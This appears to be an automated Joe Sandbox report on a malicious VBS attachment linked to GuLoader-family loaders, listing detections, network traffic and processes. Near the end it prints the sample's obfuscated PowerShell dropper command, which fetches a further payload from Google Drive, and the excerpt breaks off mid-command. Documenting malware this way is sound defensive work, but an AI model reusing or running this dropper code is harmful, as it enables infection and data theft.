  • Data Destruction
  • Data Encrypted for Impact
  • Service Stop
Source | Detection | Scanner | Label
e-dekont_swift-details.vbs | 8% | ReversingLabs | Script-WScript.Trojan.Heuristic
e-dekont_swift-details.vbs | 11% | Virustotal |
No Antivirus matches
Source | Detection | Scanner | Label
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware
https://contoso.com/ | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
drive.google.com | 142.250.65.174 | true | false | | high
drive.usercontent.google.com | 142.250.65.225 | true | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://go.micro0 | powershell.exe, 00000002.00000002.2194313854.0000017EBBD4D000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://www.google.com | powershell.exe, 00000002.00000002.2194313854.0000017EBAEB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAF1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAED0000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2222207456.0000017ECAB40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2222207456.0000017ECA9FE000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://drive.usercontent.google.com | powershell.exe, 00000002.00000002.2194313854.0000017EBAED8000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://drive.googPR2 | powershell.exe, 00000002.00000002.2194313854.0000017EBC9CE000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.2194313854.0000017EBABB8000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.2194313854.0000017EBABB8000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000002.00000002.2222207456.0000017ECA9FE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2222207456.0000017ECAB40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2222207456.0000017ECA9FE000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000002.00000002.2222207456.0000017ECA9FE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000002.00000002.2222207456.0000017ECA9FE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://drive.google.com | powershell.exe, 00000002.00000002.2194313854.0000017EBABB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBC9CE000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://drive.usercontent.google.com | powershell.exe, 00000002.00000002.2194313854.0000017EBAED0000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://drive.google.com | powershell.exe, 00000002.00000002.2194313854.0000017EBCB97000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.2194313854.0000017EBA991000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://apis.google.com | powershell.exe, 00000002.00000002.2194313854.0000017EBAEB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAF1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAED0000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.2194313854.0000017EBA991000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.2194313854.0000017EBABB8000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.65.174 | drive.google.com | United States | 15169 | GOOGLEUS | false
142.250.65.225 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1430130
Start date and time: 2024-04-23 08:05:38 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 31s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: e-dekont_swift-details.vbs
Detection: MAL
Classification: mal100.expl.evad.winVBS@6/4@2/2
EGA Information: Failed
HCA Information: Failed
                                  Cookbook Comments:
                                  • Found application associated with file extension: .vbs
                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target powershell.exe, PID 1132 because it is empty
• Not all processes were analyzed; the report is missing behavior information
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
08:06:26 | API Interceptor | 43x Sleep call for process: powershell.exe modified
                                  No context
                                   Match: 3b5074b1b5d032e5620f69f9f700ff0e
                                   Associated Sample Name / URL                            Detection  Threat Name           Context
                                   TRANSPORT_INSTRUCTION_MR.vbs                            malicious  AgentTesla, GuLoader  142.250.65.174, 142.250.65.225
                                   Gestión Pago a Proveedores - Liquidación anticipo.hta   malicious  AgentTesla, GuLoader  142.250.65.174, 142.250.65.225
                                   shipping document.vbs                                   malicious  FormBook, GuLoader    142.250.65.174, 142.250.65.225
                                   copy_76499Kxls.vbs                                      malicious  Remcos, GuLoader      142.250.65.174, 142.250.65.225
                                   Swift_Message#1234323456.vbs                            malicious  AgentTesla, GuLoader  142.250.65.174, 142.250.65.225
                                   72625413524.vbs                                         malicious  XWorm                 142.250.65.174, 142.250.65.225
                                   Purchase Inquiry.vbs                                    malicious  AgentTesla            142.250.65.174, 142.250.65.225
                                   Shipping Document_PDF.vbs                               malicious  Unknown               142.250.65.174, 142.250.65.225
                                   BitTorrent-7.6.exe                                      malicious  Unknown               142.250.65.174, 142.250.65.225
                                   BitTorrent-7.6.exe                                      malicious  Unknown               142.250.65.174, 142.250.65.225
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):64
                                  Entropy (8bit):1.1940658735648508
                                  Encrypted:false
                                  SSDEEP:3:Nlllultnxj:NllU
                                  MD5:F93358E626551B46E6ED5A0A9D29BD51
                                  SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                  SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                  SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview:@...e................................................@..........
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:HTML document, ASCII text, with very long lines (1692), with no line terminators
                                  Category:dropped
                                  Size (bytes):1692
                                  Entropy (8bit):5.104847536630024
                                  Encrypted:false
                                  SSDEEP:24:hazsp4slvhXlhEG0qnXXX08Ucq9J8mZoWHMzj+cB7jTsoT9FyVZ81wmna:7pVmRq+fjsueFYaWJ
                                  MD5:431E9971F02B8A42CB4817FC3BB27192
                                  SHA1:BBBD7972B0D8142A88EA1210A68799F914C3F971
                                  SHA-256:20776F4A74F3ABF1592D140EB31A3D3B296E25C7E51A43D8B6F0EADABDC86119
                                  SHA-512:565F70DF91201637A7EBFA33BA633046DBA720103716F39D5641AEA5DCFAA3D0F7599A68354C920617317F47ADE454395173D5CBD7F39B5A1B588F19D50C0F8E
                                  Malicious:false
                                  Reputation:low
                                  Preview:<!DOCTYPE html><html><head><title>Google Drive - Infected file</title><meta http-equiv="content-type" content="text/html; charset=utf-8"/><style nonce="NJq9BtQepwJf6rPmYJMqnw">.goog-link-button{position:relative;color:#15c;text-decoration:underline;cursor:pointer}.goog-link-button-disabled{color:#ccc;text-decoration:none;cursor:default}body{color:#222;font:normal 13px/1.4 arial,sans-serif;margin:0}.grecaptcha-badge{visibility:hidden}.uc-main{padding-top:50px;text-align:center}#uc-dl-icon{display:inline-block;margin-top:16px;padding-right:1em;vertical-align:top}#uc-text{display:inline-block;max-width:68ex;text-align:left}.uc-error-caption,.uc-warning-caption{color:#222;font-size:16px}#uc-download-link{text-decoration:none}.uc-name-size a{color:#15c;text-decoration:none}.uc-name-size a:visited{color:#61c;text-decoration:none}.uc-name-size a:active{color:#d14836;text-decoration:none}.uc-footer{color:#777;font-size:11px;padding-bottom:5ex;padding-top:5ex;text-align:center}.uc-footer a{colo
                                  File type:ASCII text, with very long lines (355), with CRLF line terminators
                                  Entropy (8bit):5.350753385694196
                                  TrID:
                                  • Visual Basic Script (13500/0) 100.00%
                                  File name:e-dekont_swift-details.vbs
                                  File size:8'469 bytes
                                  MD5:0e0c52158e1cba6703c6456335cf228e
                                  SHA1:e79505cdd6282f492c37e632239f0a7fc8324bd4
                                  SHA256:fc7408dea9e0199b472661201fa866e1bf65e7a7d249b5b9e66f036efff85ab1
                                  SHA512:65cf187b7a63d407a04018323f5466e2b59c7af9a21329d78a6f58ce05884e0148745c9281e4442afd77a994880b101c02cf02655e543813f417a901f85a676d
                                  SSDEEP:192:i0V/UzHNP68NIss2XX5YiwLD1T9EFk8tvec171fz1eMtwYdos:pUzN6mIaaLQFNvei7/ev8
                                  TLSH:5A027D7CBB6231946E6B37390E5A90D4D9E501FFE15C6915F53C1381B002A1C704BFAE
                                  File Content Preview:.. ..Function Salmiaks14 ......W3 = W3 & "$Koldblodig = 1;$Arbejdskatalogs119='Substrin';$Arbejdskatalogs119+='g';Function Hungerless($Besnakkelsen){$Phylloxerae=$Besnakkelsen.Length-$Koldblodig;For($Monsterhood=5; $Monsterhood -lt $Phylloxerae; $Monsterh
                                  Icon Hash:68d69b8f86ab9a86
                                   Timestamp                             Source Port  Dest Port  Source IP       Dest IP
                                   Apr 23, 2024 08:06:27.839684010 CEST  49699        443        192.168.2.6     142.250.65.174
                                   Apr 23, 2024 08:06:27.839730978 CEST  443          49699      142.250.65.174  192.168.2.6
                                   Apr 23, 2024 08:06:27.839809895 CEST  49699        443        192.168.2.6     142.250.65.174
                                   Apr 23, 2024 08:06:27.848156929 CEST  49699        443        192.168.2.6     142.250.65.174
                                   Apr 23, 2024 08:06:27.848170042 CEST  443          49699      142.250.65.174  192.168.2.6
                                   Apr 23, 2024 08:06:28.046112061 CEST  443          49699      142.250.65.174  192.168.2.6
                                   Apr 23, 2024 08:06:28.046363115 CEST  49699        443        192.168.2.6     142.250.65.174
                                   Apr 23, 2024 08:06:28.047208071 CEST  443          49699      142.250.65.174  192.168.2.6
                                   Apr 23, 2024 08:06:28.047266960 CEST  49699        443        192.168.2.6     142.250.65.174
                                   Apr 23, 2024 08:06:28.051444054 CEST  49699        443        192.168.2.6     142.250.65.174
                                   Apr 23, 2024 08:06:28.051450014 CEST  443          49699      142.250.65.174  192.168.2.6
                                   Apr 23, 2024 08:06:28.051688910 CEST  443          49699      142.250.65.174  192.168.2.6
                                   Apr 23, 2024 08:06:28.062952042 CEST  49699        443        192.168.2.6     142.250.65.174
                                   Apr 23, 2024 08:06:28.104119062 CEST  443          49699      142.250.65.174  192.168.2.6
                                   Apr 23, 2024 08:06:28.249488115 CEST  443          49699      142.250.65.174  192.168.2.6
                                   Apr 23, 2024 08:06:28.249821901 CEST  443          49699      142.250.65.174  192.168.2.6
                                   Apr 23, 2024 08:06:28.249875069 CEST  49699        443        192.168.2.6     142.250.65.174
                                   Apr 23, 2024 08:06:28.252088070 CEST  49699        443        192.168.2.6     142.250.65.174
                                   Apr 23, 2024 08:06:28.344535112 CEST  49700        443        192.168.2.6     142.250.65.225
                                   Apr 23, 2024 08:06:28.344587088 CEST  443          49700      142.250.65.225  192.168.2.6
                                   Apr 23, 2024 08:06:28.344655037 CEST  49700        443        192.168.2.6     142.250.65.225
                                   Apr 23, 2024 08:06:28.345406055 CEST  49700        443        192.168.2.6     142.250.65.225
                                   Apr 23, 2024 08:06:28.345421076 CEST  443          49700      142.250.65.225  192.168.2.6
                                   Apr 23, 2024 08:06:28.536273956 CEST  443          49700      142.250.65.225  192.168.2.6
                                   Apr 23, 2024 08:06:28.536351919 CEST  49700        443        192.168.2.6     142.250.65.225
                                   Apr 23, 2024 08:06:28.539360046 CEST  49700        443        192.168.2.6     142.250.65.225
                                   Apr 23, 2024 08:06:28.539371014 CEST  443          49700      142.250.65.225  192.168.2.6
                                   Apr 23, 2024 08:06:28.539755106 CEST  443          49700      142.250.65.225  192.168.2.6
                                   Apr 23, 2024 08:06:28.540647984 CEST  49700        443        192.168.2.6     142.250.65.225
                                   Apr 23, 2024 08:06:28.584120035 CEST  443          49700      142.250.65.225  192.168.2.6
                                   Apr 23, 2024 08:06:29.097103119 CEST  443          49700      142.250.65.225  192.168.2.6
                                   Apr 23, 2024 08:06:29.097161055 CEST  443          49700      142.250.65.225  192.168.2.6
                                   Apr 23, 2024 08:06:29.097223043 CEST  443          49700      142.250.65.225  192.168.2.6
                                   Apr 23, 2024 08:06:29.097337961 CEST  49700        443        192.168.2.6     142.250.65.225
                                   Apr 23, 2024 08:06:29.097337961 CEST  49700        443        192.168.2.6     142.250.65.225
                                   Apr 23, 2024 08:06:29.099706888 CEST  49700        443        192.168.2.6     142.250.65.225
                                   Timestamp                             Source Port  Dest Port  Source IP    Dest IP
                                   Apr 23, 2024 08:06:27.744230032 CEST  53716        53         192.168.2.6  1.1.1.1
                                   Apr 23, 2024 08:06:27.832860947 CEST  53           53716      1.1.1.1      192.168.2.6
                                   Apr 23, 2024 08:06:28.253473043 CEST  64152        53         192.168.2.6  1.1.1.1
                                   Apr 23, 2024 08:06:28.342027903 CEST  53           64152      1.1.1.1      192.168.2.6
                                   Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name                          Type            Class        DNS over HTTPS
                                   Apr 23, 2024 08:06:27.744230032 CEST  192.168.2.6  1.1.1.1  0xd856    Standard query (0)  drive.google.com              A (IP address)  IN (0x0001)  false
                                   Apr 23, 2024 08:06:28.253473043 CEST  192.168.2.6  1.1.1.1  0xc970    Standard query (0)  drive.usercontent.google.com  A (IP address)  IN (0x0001)  false
                                   Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name                          CName  Address         Type            Class        DNS over HTTPS
                                   Apr 23, 2024 08:06:27.832860947 CEST  1.1.1.1    192.168.2.6  0xd856    No error (0)  drive.google.com                     142.250.65.174  A (IP address)  IN (0x0001)  false
                                   Apr 23, 2024 08:06:28.342027903 CEST  1.1.1.1    192.168.2.6  0xc970    No error (0)  drive.usercontent.google.com         142.250.65.225  A (IP address)  IN (0x0001)  false
                                  • drive.google.com
                                  • drive.usercontent.google.com
                                   Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                   0           192.168.2.6  49699        142.250.65.174  443               1132  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                   Timestamp                Bytes transferred  Direction  Data
                                   2024-04-23 06:06:28 UTC  215                OUT        GET /uc?export=download&id=1NwQlXcqBSLzRRff6p4AYPKPRu2G08-iT HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                   2024-04-23 06:06:28 UTC  1582               IN         HTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Tue, 23 Apr 2024 06:06:28 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1NwQlXcqBSLzRRff6p4AYPKPRu2G08-iT&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Content-Security-Policy: script-src 'nonce-GDomhJoe6WnP2u6wTUNqKA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Cross-Origin-Opener-Policy: same-origin
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                   Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                   1           192.168.2.6  49700        142.250.65.225  443               1132  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                   Timestamp                Bytes transferred  Direction  Data
                                   2024-04-23 06:06:28 UTC  233                OUT        GET /download?id=1NwQlXcqBSLzRRff6p4AYPKPRu2G08-iT&export=download HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                  Host: drive.usercontent.google.com
                                  Connection: Keep-Alive
                                   2024-04-23 06:06:29 UTC  2120               IN         HTTP/1.1 200 OK
                                  X-GUploader-UploadID: ABPtcPoQRh5ZYIHTLVn8j2xptMGZwqBCKEXygcZ787sVHTuyHmRd-uZE6qSke7llx-SL1n3YZuA
                                  Content-Type: text/html; charset=utf-8
                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Tue, 23 Apr 2024 06:06:29 GMT
                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Content-Security-Policy: script-src 'nonce-S5Au2cwHPvQV4-Gha0ZHBA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Cross-Origin-Opener-Policy: same-origin
                                  Cross-Origin-Resource-Policy: same-site
                                  reporting-endpoints: default="/_/DriveUntrustedContentHttp/web-reports?context=eJzj0tDikmJw1JBisN47ndUeiJ3SZ7CGAPHqn-dY1wPx4rDzrCuAWIib4-n8uRvZBDb83CUKAPK2FOQ"
                                  Content-Length: 1692
                                  Server: UploadServer
                                  Set-Cookie: NID=513=TQCvhUHaHH9t9FGBrSeqW4KfiovelqPob-ILeSM0R_NCyG7RDYRFjBebK4ma6o70WMGJsmFWg4t0O2KAafaKkAGH2sPOimSFZ5keq2gOpgWYhpP_2oFpb3vZ1b7Qr_8PiNm5wv0Q2P19zGV-Dt4vhUUHCmt-3Il1qJ2HikODVEM; expires=Wed, 23-Oct-2024 06:06:28 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Content-Security-Policy: sandbox allow-scripts
                                  Connection: close
                                   2024-04-23 06:06:29 UTC  1692               IN         Data Ascii: <!DOCTYPE html><html><head><title>Google Drive - Infected file</title><meta http-equiv="content-type" content="text/html; charset=utf-8"/><style nonce="NJq9BtQepwJf6rPmYJMqnw">.goog-link-button{position:relative;color:#15c;text-decoration:underline;cursor



                                  Target ID:0
                                  Start time:08:06:24
                                  Start date:23/04/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\e-dekont_swift-details.vbs"
                                  Imagebase:0x7ff6ea3a0000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:2
                                  Start time:08:06:24
                                  Start date:23/04/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Koldblodig = 1;$Arbejdskatalogs119='Substrin';$Arbejdskatalogs119+='g';Function Hungerless($Besnakkelsen){$Phylloxerae=$Besnakkelsen.Length-$Koldblodig;For($Monsterhood=5; $Monsterhood -lt $Phylloxerae; $Monsterhood+=(6)){$Apadana+=$Besnakkelsen.$Arbejdskatalogs119.Invoke($Monsterhood, $Koldblodig);}$Apadana;}function toptekster($Hypoglottis){& ($Formode) ($Hypoglottis);}$Ahistoric=Hungerless ' Af,rM,ithsoUnconzdesigi,sperlSparelOut,oaDelim/ Neur5Armag.Sinds0.nven Tanta( FlytW CramidriftnTyphadSurreoFueliw SammsSek,u feathNBromdTSkval Bandc1over 0Ejend. M.nn0,ooln;Torde FishWDual iLaighnun.on6 Pudr4Stvfn;Chrom Stivexdebar6Grsni4Famul;Dib e forudrKoralvOveri:Ku ib1Unawa2Befar1S.lva.Gri n0aeroc)Jordo DelkrGInvaleGuiltc LoddkFlueno Skat/Zooli2Desme0Milit1Morib0Biote0Afdra1Dicty0Summa1 Omni UdtaFSk lei NotorSharpeUntonf Dybso TerexZo ie/ Gdni1Hyper2Oscil1 Tvr .Pitch0Palin ';$Opvurderings=Hungerless 'pro,hUUnexpsAlthieBrugerV nys-OvertA Pal ghlf,ieFantan.uscut,craz ';$Sadelmagervrkstedet=Hungerless 'Dekr.hTaph tDemodtCir.epGrindsSciss:Fri s/Kalci/Leucrd Sul,rForskiTa brvbrewseSrgef.SockmgAftllose geoTransg TukalSupere Alk..Mercuc Udg o.djunm Plur/ FotouBeboecForsa?Se,laeSjuskxE,glipImmisoChangrSlukntKivin=Haustd AlleoMa,ilw .unlnSyrinlSoluroEjendaS,ruedConti&,mfariMglerdB,han=Fladb1MysidN FlorwSensaQShopplHaandXOrrancOverlqLegenB SaraSI,munLmo thzAnap RUn crRNrtfofProtofStere6Bespap G,ll4ArsenA MultYWhynePFasciKLunkhP Be,iRSpirauWasse2MelleG,nsil0Grund8.ombi-Kr bsiEctroTLag.i ';$Inddelingens=Hungerless ' Insp>Pi,na ';$Formode=Hungerless 'Maalei ti,leSw epxSatel ';$Unpark147='Inferiority197';toptekster (Hungerless 'ErnriS NonseForhat,aden- Mi,rCObjeko H dfn hypntSupereAccornVarsetIn,la Super-mass.PSlutnaApophtUntrahdek,n DragT Unen:Frilu\KlitoG Brugi SablgSubsahNilleeHakni. 
Se,gtund sxLimstt H,ls Mass-AnnyuV Eneta tyrl K,onuNonprePo er Bourg$EvovaUBankrnRomanpSjoveaSkotsrUrostku hum1Broc,4Marin7Wishe;signa ');toptekster (Hungerless 'Pris.iFllesf.sbes Udkra( kerot FewdeHofdesMispotSnowm- Fo.lpTimw.aundebtWelteh All. SuleTEtnol:Delit\g rniGPendlibladfg I tehprocoeHamul.ColletBladexAfsvrtP,rag)pr,ck{Ur.ereStepdxTypotiFolket Bord}Myoso;Rack, ');$Lntillgs = Hungerless 'Longee.takncCa,nohZooloo Moor Anded%NeugraArtisppremipWe,tedDe roa Bol.t belnaBrdty% Gibr\IndtakT knoaPyr prAmbilt frysoDigittO.traeSterikAutoms Fienk serro mbrerdis utLufttsHa,nd.ForsvVHemidr A,trd Male Ring&Urbic&T.ecl telefe Sproc,enneh ,ustoBlesk Vigor$Sider ';toptekster (Hungerless 'Tar.a$FlathgFiflklOutguoWon,sbFelesaoverflCar,o:rnefoRBurniaTonefaMet.odSystesQuitcl Torta Stopaned.aeSp,ratDatan=Ca am( SkrecRadikmG.ssydPerif Afma/OttincJacke Gylde$VitriLBely.nLucilt RangiLa.unl PrimlPreteg K.ics Neot)Rec t ');toptekster (Hungerless ' ond$.lejlgO,poslPriksoRestebSpillaEmballAdept:FightVSmutve,ubstrTrad,mOrtogi avorl BiceiHackbnRnkeng PietuE,ecteO,nersKu st=Be jl$DeklaSmart,aRefredEs,ereNe erl Ve.tm .ekla Blotg UsdeeIndverForstvAmanurNubi.k EutrsGigabt UnsceStilndDeliqe PrectPicad.WholesSalpiphen,elOra,giOv rstDanma( B.fa$NovicI uashnSammedStab.dbrydneCirculTelepiWinnonMe,degUnabre B.acn DefusProgr) D,al ');$Sadelmagervrkstedet=$Vermilingues[0];toptekster (Hungerless 'Ti ss$VandigFemkal Coy.oF.stebH.alia Win lGenne:Spe.iFGrap.uStav nOp,hakNonent SaliiSkraaoHystenOve fs Se faNonsofBlondpmyelirUucpnvTawn.nVestri AnagnBepl gPendre H,inngustesarvea=OutstNKorr.eReinswSprin-.artyOHilstb Tripj,vereespildc,enzotTjats DinerSPr.jnySpisesKlerktPartheCangim.enin.tamm N.aimae Spist Supe.TumblW ForteMes,ibAf.adCSte mlFireaiFolkeeE,pulnUafhatMelle ');toptekster (Hungerless 'Atomd$ StivFRverhu .esynUd,ikkbilletun.aci unjoAn,manBoa.lsDkadra,eaktf,atiop heffr MalevEntomnHookaiSierrnA utegRe ise ambrnTyggesAr.er.BenovH H rteV,teraHydr,d Mekae.educrudko.s Tan,[Vand,$ArionOStrejpTils.v Pre 
